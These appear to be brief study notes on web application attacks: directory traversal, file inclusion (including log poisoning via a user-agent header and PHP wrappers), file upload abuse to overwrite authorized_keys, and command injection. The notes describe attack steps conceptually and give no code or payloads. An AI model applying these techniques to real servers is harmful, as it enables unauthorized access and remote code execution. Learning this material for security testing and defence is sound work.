Content
Directory traversal
File inclusion vulnerabilities
File upload vulnerabilities
Command injection
9.1. Directory traversal
Leaks a file from the file system of the server
Check for url parameters, e.g. content=index.html
Unix via ../
Windows via ../ or ..\
9.2. File Inclusion Vulnerabilities
“includes” a file into the web applicaiton running code, which might enables code execution
content:
local file inclusion (lfi)
php wrappers
remote file inclusion (rfi)
Directory travesal + File inclusion attack
Setting
Assume directory travesal vuln, which might leak apache log files
Apache log file contains user-agent header of each request
Assume file inclusion vuln, where user can include files into the applications code (e.g. via php include statement)
Attack:
Perform request with poisoned user agent header, which contains php code
use file inclusion vuln to include apache log into application space and run malicious php code
PHP wrappers
if the attacker controls the php include statement, we can use php wrappers to execute code or exfiltrate php files (base64 encoded data)
Remote file inclusion
attacker controlled file can be included
triggers RCE in php
requires php setting “allow_ url include”
9.3. File Upload Vulnerabilities
In general three types:
upload executable code (e.g. PHP files)
uploading files suffers from directory traversal, which allows us to overwrite system files (e.g. authorized keys)
or we can perform XSS or XXE attacks
uploading files, which will be opened by victim (e.g. malicious .docx file) -> not relevant
Uploading executable files
avatar, blog posts, CV upload, etc
if uploads are filtered by extension, try to bypass the filter
after upload, find directory and trigger execution
Uploading non-executable files
the file upload might suffers from a directory travesal vulnerablity
this might allow an attacker to overwrite system files, such as authorized_keys
9.4. Command Injection
application does not sanitize user input correctly
user can inject commands into server, which allows him to trigger RCE
Last changeda year ago